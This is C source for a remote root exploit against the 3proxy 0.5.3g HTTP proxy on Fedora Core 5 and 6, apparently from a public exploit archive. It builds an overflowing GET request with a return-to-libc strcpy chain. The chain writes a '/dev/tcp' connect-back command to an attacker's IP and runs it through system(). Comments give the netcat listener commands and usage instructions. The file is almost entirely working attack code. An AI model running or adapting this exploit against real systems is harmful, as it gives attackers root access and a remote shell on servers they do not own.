/* ** ** Fedora Core 5,6 (exec-shield) based ** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit ** (reverse connect-back method) by Xpl017Elz ** ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** ** Reference: http://www.securityfocus.com/bid/23545 ** vendor: http://3proxy.ru/ ** ** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit: ** http://www.milw0rm.com/exploits/3821 (x3proxy.c) ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), . ** My World: http://x82.inetcop.org ** */ /* ** -=-= POINT! POINT! POINT! POINT! POINT! =-=- ** ** It is a relatively easy exploit case. ** It doesn't need any exec family functions or manipulating address of ** system() function, popen() function. ** ** It just needs simple set of strings to make a connect-back shell. ** for some hosts that don't have netcat, we organize attack code like this. ** ** -- ** (gdb) x/s 0x08051e5c ** 0x8051e5c: "sh/dev/tcp/8282828282/5678" ** (gdb) ** -- ** ** Let the 56789 port of attacker's server be opened and ** when the attack is succeed hacker can SEND a COMMAND through the port. ** ** -- ** $ nc -l -p 56789 ** -- ** ** Now, we open another port(this time 5678) on attacker's server and ** when the attack is succeed hacer can GET a RESULT through the port. ** ** -- ** $ nc -l -p 5678 ** -- ** ** It's very simple and easy! ** */ #include #include #include #include #include #include /* ** Fedora Core release 6 (Zod) ** 2.6.18-1.2798.fc6 #1 ** locale (GNU libc) 2.5 ** gcc version 4.1.1 20061011 (Red Hat 4.1.1-30) ** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz) */ #define FC6_STRCPY_PLT 0x08048e3c // #define FC6_MOVE_ESP 0x0804f7c5 // <__do_global_ctors_aux> epilogue #define FC6_CMD_LOC 0x08051e5c #define FC6_NULL_STR 0x08051e4c // 0x00000000 #define FC6_NUM 0x08050d74 // "0" #define FC6_SH_STR 0x08048703 // "fflush" #define FC6_REDIR_1 0x080481ec // "<\0" #define FC6_REDIR_2 0x0804e49b // ">\0" #define FC6_SLASH_STR 0x08050d7f // "/\0" #define FC6_DEV_STR1 0x08050d5d // "de" #define FC6_DEV_STR2 0x08050d6f // "v" #define FC6_TCP_STR1 0x0805065f // "/t" #define FC6_TCP_STR2 0x08048709 // "strcpy" #define FC6_PORT_56789 0x08050d79 // "56789+/" #define FC6_SYSTEM_PLT 0x08048cbc // /* ** Fedora Core release 5 (Bordeaux) ** 2.6.15-1.2054_FC5 #1 ** locale (GNU libc) 2.4 ** gcc version 4.1.0 20060304 (Red Hat 4.1.0-3) ** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz) */ #define FC5_STRCPY_PLT 0x08049194 // #define FC5_MOVE_ESP 0x0804f9a6 // <__do_global_ctors_aux> epilogue #define FC5_CMD_LOC 0x08051e5c #define FC5_NULL_STR 0x08051e4c // 0x00000000 #define FC5_NUM 0x08050f54 // "0" #define FC5_SH_STR 0x08048938 // "fflush" #define FC5_REDIR_1 0x080495bc // "<\0" #define FC5_REDIR_2 0x0804e68b // ">\0" #define FC5_SLASH_STR 0x08049ec3 // "/\0" #define FC5_DEV_STR1 0x08050f3d // "de" #define FC5_DEV_STR2 0x08050f4f // "v" #define FC5_TCP_STR1 0x0805083b // "/t" #define FC5_TCP_STR2 0x080488e4 // "strcpy" #define FC5_PORT_56789 0x08050f59 // "56789+/" #define FC5_SYSTEM_PLT 0x08048ed4 // int main(int argc,char *argv[]){ u_long strcpy_plt; u_long move_esp; u_long cmd_loc; u_long null_str; u_long num; u_long sh_str; u_long redir_1; u_long redir_2; u_long slash_str; u_long dev_str1; u_long dev_str2; u_long tcp_str1; u_long tcp_str2; u_long port_56789; u_long system_plt; struct hostent *se; struct sockaddr_in saddr; unsigned char do_ex[4096]; int i,l,sock; u_long ip,ip1,ip2,ip3,ip4; unsigned char attacker_ip[256]; char host[256]; int port=3128; ip=ip1=ip2=ip3=ip4; memset((char *)do_ex,0,sizeof(do_ex)); printf("/*\n**\n** Fedora Core 5,6 (exec-shield) based\n" "** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit\n" "** by Xpl017Elz\n**\n"); if(argc<5){ printf("** Usage: %s [host] [port] [attacker ip] [type]\n",argv[0]); printf("**\n** host: 3proxy HTTP Proxy server\n"); printf("** port: default 3128\n"); printf("** attacker ip: attacker netcat host\n"); printf("** type: {0} - Fedora Core release 5 (Bordeaux), exec-shield default enabled.\n"); printf("** {1} - Fedora Core release 6 (Zod), exec-shield default enabled.\n**\n"); printf("** Example: %s 3proxy.use_host.co.kr 3128 82.82.82.82 1\n**\n*/\n",argv[0]); exit(-1); } if(atoi(argv[4])){ strcpy_plt=FC6_STRCPY_PLT; move_esp=FC6_MOVE_ESP; cmd_loc=FC6_CMD_LOC; null_str=FC6_NULL_STR; num=FC6_NUM; sh_str=FC6_SH_STR; redir_1=FC6_REDIR_1; redir_2=FC6_REDIR_2; slash_str=FC6_SLASH_STR; dev_str1=FC6_DEV_STR1; dev_str2=FC6_DEV_STR2; tcp_str1=FC6_TCP_STR1; tcp_str2=FC6_TCP_STR2; port_56789=FC6_PORT_56789; system_plt=FC6_SYSTEM_PLT; } else { strcpy_plt=FC5_STRCPY_PLT; move_esp=FC5_MOVE_ESP; cmd_loc=FC5_CMD_LOC; null_str=FC5_NULL_STR; num=FC5_NUM; sh_str=FC5_SH_STR; redir_1=FC5_REDIR_1; redir_2=FC5_REDIR_2; slash_str=FC5_SLASH_STR; dev_str1=FC5_DEV_STR1; dev_str2=FC5_DEV_STR2; tcp_str1=FC5_TCP_STR1; tcp_str2=FC5_TCP_STR2; port_56789=FC5_PORT_56789; system_plt=FC5_SYSTEM_PLT; } sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); #define IP1 16777216 #define IP2 65536 #define IP3 256 ip=0; ip+=ip1 * (IP1); ip+=ip2 * (IP2); ip+=ip3 * (IP3); ip+=ip4; memset((char *)attacker_ip,0,256); sprintf(attacker_ip,"%10lu",ip); memset((char *)host,0,sizeof(host)); strncpy(host,argv[1],sizeof(host)-1); port=atoi(argv[2]); se=gethostbyname(host); if(se==NULL){ printf("** gethostbyname() error\n**\n*/\n"); return -1; } sock=socket(AF_INET,SOCK_STREAM,0); if(sock==-1){ printf("** socket() error\n**\n*/\n"); return -1; } saddr.sin_family=AF_INET; saddr.sin_port=htons(port); saddr.sin_addr=*((struct in_addr *)se->h_addr); bzero(&(saddr.sin_zero),8); printf("** make exploit\n"); sprintf(do_ex,"GET /"); l=strlen(do_ex); for(i=0;i<1800-444;i++,l++){ sprintf(do_ex+l,"A"); } #define __GOGOSSING(dest,index,src){\ *(long *)&dest[index]=src;\ index+=4;\ } l=0; __GOGOSSING(do_ex,i,move_esp); /* 0x0d filter */ __GOGOSSING(do_ex,i,0x0d0d0d0d); __GOGOSSING(do_ex,i,0x0d0d0d0d); __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,sh_str); l+=2; /* "sh" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,redir_1); l+=1; /* ">" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,slash_str); l+=1; /* "/" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,dev_str1); l+=2; /* "de" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,dev_str2); l+=1; /* "v" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,tcp_str1); l+=2; /* "/t" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,tcp_str2); l+=2; /* "cp" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,slash_str); l+=1; /* "/" */ /* IP address part */ for(ip=0;ip<10;ip++){ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); switch(attacker_ip[ip]){ case '0': __GOGOSSING(do_ex,i,num); break; case '1': __GOGOSSING(do_ex,i,num+1); break; case '2': __GOGOSSING(do_ex,i,num+2); break; case '3': __GOGOSSING(do_ex,i,num+3); break; case '4': __GOGOSSING(do_ex,i,num+4); break; case '5': __GOGOSSING(do_ex,i,num+5); break; case '6': __GOGOSSING(do_ex,i,num+6); break; case '7': __GOGOSSING(do_ex,i,num+7); break; case '8': __GOGOSSING(do_ex,i,num+8); break; case '9': __GOGOSSING(do_ex,i,num+9); break; } l+=1; } __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,slash_str); l+=1; /* "/" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,port_56789); l+=5; /* "56789" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,redir_2); l+=1; /* ">" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,null_str); /* null */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,null_str-40); __GOGOSSING(do_ex,i,cmd_loc+3); /* copy, "/dev/tcp/ip_addr/port" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,null_str-40); l+=24; /* "/dev/tcp/ip_addr/port" */ __GOGOSSING(do_ex,i,strcpy_plt); __GOGOSSING(do_ex,i,move_esp); __GOGOSSING(do_ex,i,cmd_loc+l); __GOGOSSING(do_ex,i,null_str); /* port number: 5678 */ /* system() plt */ __GOGOSSING(do_ex,i,system_plt); __GOGOSSING(do_ex,i,0x82828282); __GOGOSSING(do_ex,i,cmd_loc); sprintf(do_ex+i,"\nHost: "); i=strlen(do_ex); for(l=0;l<700;l++){ do_ex[i++]='A'; } do_ex[i++]='\n'; do_ex[i++]='\n'; printf("** total packet size: %d\n",strlen(do_ex)); l=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); if(l==-1){ printf("** connect() error\n**\n*/\n"); return -1; } else { printf("** send exploit\n"); send(sock,do_ex,i,0); } close(sock); printf("** attacker host, check it up, now!\n**\n*/\n"); exit(0); } /* eox */